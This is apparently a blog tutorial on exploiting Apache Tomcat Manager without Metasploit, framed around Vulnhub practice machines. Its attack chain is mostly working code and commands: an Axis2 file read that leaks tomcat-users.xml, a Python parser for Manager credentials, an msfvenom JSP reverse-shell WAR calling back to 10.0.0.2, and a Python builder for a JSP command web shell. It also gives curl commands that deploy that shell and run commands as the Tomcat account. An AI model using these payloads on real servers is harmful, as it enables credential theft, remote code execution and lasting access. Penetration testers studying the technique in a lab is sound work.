
To exploit Tomcat Manager you usually need credentials. These can be the default username and password a lazy admin has left behind, or they can be strong enough to be virtually impossible to crack.

This tutorial will show you common techniques to exploit Tomcat Manager without using Metasploit.

Want to learn more ethical hacking? I highly recommend buying my book made for beginners to Pentesting Become An Ethical Hacker. Check the price on Amazon.


What You Will Learn

  • How to exploit Tomcat Manager without Metasploit
  • Exploit the Axis2 web service
  • Deploy a payload to get a reverse shell
  • How to use netcat to get a JSP reverse shell

Exploit Axis2 Web Service

A lot of the exploitation methods for Tomcat Manager require credentials. These can be guessed or brute-forced, but how often does that actually work?

Instead, check whether the Apache Axis2 web service is deployed on the target. Axis2 runs as a web application inside the same Tomcat instance, so a file-read weakness in Axis2 gives you access to Tomcat's own configuration files.

There is already a Vulnhub machine that ships the vulnerable Axis2 web service, so you can follow along with my walkthrough.

What is required is to abuse the ProxyService endpoint to read files that should only be accessible to administrators.

In the screenshot I can view the tomcat-users.xml configuration file by exploiting the weakness in a GET parameter of this particular endpoint. That file holds the Manager usernames and passwords in clear text, which is exactly what the credential-based methods below need.
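Once tomcat-users.xml is in hand, the useful question is which of its accounts can actually drive the Manager application, and whether they can deploy a WAR or only read status. The script below is an added example, not code from the original post; the XML it parses is constructed sample data standing in for a leaked file, and the role names are the standard Tomcat Manager roles.

```python
"""Pull Manager-capable accounts out of a leaked tomcat-users.xml.

Added example (not from the original post). The sample XML is constructed.
"""
import xml.etree.ElementTree as ET

# Roles that grant access to the Manager application. The Tomcat 7+ split
# roles are listed along with the single legacy 'manager' role of Tomcat 6.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx",
                 "manager-status", "manager"}
# Only these roles allow deploying a WAR (HTML upload or the text/deploy API);
# manager-status and manager-jmx cannot be used to drop a web shell.
DEPLOY_ROLES = {"manager-gui", "manager-script", "manager"}

# Constructed sample of a Tomcat 7+ style tomcat-users.xml (default namespace).
SAMPLE_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="manager-script"/>
  <role rolename="admin-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="d3pl0y" roles="manager-script"/>
  <user username="status" password="st4tus" roles="manager-status"/>
  <user username="nobody" password="x" roles=""/>
</tomcat-users>
"""


def parse_tomcat_users(xml_text):
    """Return a list of (username, password, roles) tuples from tomcat-users.xml."""
    root = ET.fromstring(xml_text)
    users = []
    # Newer files carry a default namespace, older ones do not; strip it either way.
    for elem in root.iter():
        tag = elem.tag.rsplit("}", 1)[-1]
        if tag != "user":
            continue
        # Tomcat accepts either 'username' or 'name' as the account attribute.
        name = elem.get("username") or elem.get("name")
        password = elem.get("password", "")
        roles = {r.strip() for r in elem.get("roles", "").split(",") if r.strip()}
        users.append((name, password, roles))
    return users


def manager_accounts(xml_text):
    """Accounts that can reach the Manager app, flagged by whether they can deploy."""
    results = []
    for name, password, roles in parse_tomcat_users(xml_text):
        if roles & MANAGER_ROLES:
            results.append({"user": name, "password": password,
                            "can_deploy": bool(roles & DEPLOY_ROLES)})
    return results


if __name__ == "__main__":
    for acct in manager_accounts(SAMPLE_TOMCAT_USERS):
        kind = "deploy" if acct["can_deploy"] else "read-only"
        print(f"{acct['user']}:{acct['password']}  ({kind})")
```

Run it against the real file you pulled through the Axis2 endpoint instead of the sample string. An account flagged `deploy` is what you need for the WAR upload in the next sections; `manager-gui` works through the HTML console, while `manager-script` works through the text API that curl can drive.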

Create WAR Payload Using Msfvenom

Before I can deploy a .war file I have to create it. The msfvenom command below produces a non-staged JSP reverse shell that connects back to LHOST:LPORT, so only msfvenom is used, not the Metasploit handler.

msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.0.0.2 LPORT=1234 -f war > shell.war

Exploit Tomcat Manager Without Using Metasploit

Start a netcat listener on the LPORT you gave msfvenom (1234 above) to receive the non-staged payload. To execute the payload once it is deployed, simply click on the context path (/warshell) in the Tomcat Manager console.

Browsing directly to that path in the URL bar executes the shell as well, which is handy when you deployed through the text API and have no console open.

How To Exploit Tomcat Manager

Upload A JSP Webshell

Just as I can upload a web shell to a web server that executes PHP (think Drupal, WordPress, etc.), I can upload a web shell to the Java-based Apache Tomcat server.

First I need to write a web shell in JSP and package it as a .war file, then upload it through the Manager console. After that I simply browse to the shell and supply it commands, which run on the target with the privileges of the Tomcat service account.


To launch my new web shell I click on the context path, /webshell, and it takes me to a page where I can give it commands.


You can see that the command I chose, id, has just run on the target thanks to my newly deployed .war file.
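A WAR is just a zip archive with a WEB-INF/web.xml descriptor, so the JSP web shell described above can be built without msfvenom or any Java tooling. The script below is an added example, not the author's code; the JSP it embeds is a minimal command shell, and the host, port, credentials and context path in the usage note are assumptions for illustration.

```python
"""Build a JSP command web shell and pack it into a deployable .war.

Added example (not from the original post). Uses only the standard library.
"""
import io
import zipfile
import xml.etree.ElementTree as ET

# Minimal JSP that runs the ?cmd= parameter through /bin/sh and echoes the output.
# Commands execute with the privileges of the Tomcat process.
JSP_WEBSHELL = '''<%@ page import="java.io.*" %>
<pre><%
String cmd = request.getParameter("cmd");
if (cmd != null) {
    Process p = new ProcessBuilder("/bin/sh", "-c", cmd).redirectErrorStream(true).start();
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
}
%></pre>
'''

# Deployment descriptor: index.jsp is the welcome file, so clicking the context
# path in the Manager console (or requesting /webshell/) hits the shell directly.
WEB_XML = '''<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <welcome-file-list>
    <welcome-file>index.jsp</welcome-file>
  </welcome-file-list>
</web-app>
'''


def build_war(jsp_source=JSP_WEBSHELL, jsp_name="index.jsp"):
    """Return the bytes of a .war containing WEB-INF/web.xml and the JSP."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as war:
        war.writestr("WEB-INF/web.xml", WEB_XML)
        war.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def inspect_war(war_bytes):
    """Sanity-check a WAR before upload: return its entry names, failing if web.xml is broken."""
    with zipfile.ZipFile(io.BytesIO(war_bytes)) as war:
        names = war.namelist()
        ET.fromstring(war.read("WEB-INF/web.xml"))  # raises ParseError on a bad descriptor
        return sorted(names)


if __name__ == "__main__":
    data = build_war()
    with open("webshell.war", "wb") as f:
        f.write(data)
    print("wrote webshell.war with entries:", inspect_war(data))
```

With the file written, upload it through the Manager HTML console as the post describes, or, with an account holding the manager-script role on Tomcat 7 or later, deploy from the command line with `curl -u tomcat:s3cret -T webshell.war "http://10.0.0.3:8080/manager/text/deploy?path=/webshell"` (host, credentials and path are assumed values). Then `curl "http://10.0.0.3:8080/webshell/?cmd=id"` returns the output of `id` running as the Tomcat service account. Undeploy the context when you are done so the shell is not left behind for someone else.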

Typhoon Vulnhub Machine

In another, similar example the Tomcat Manager is protected only by default credentials, so no file-read weakness is needed before deploying the same .war payload.


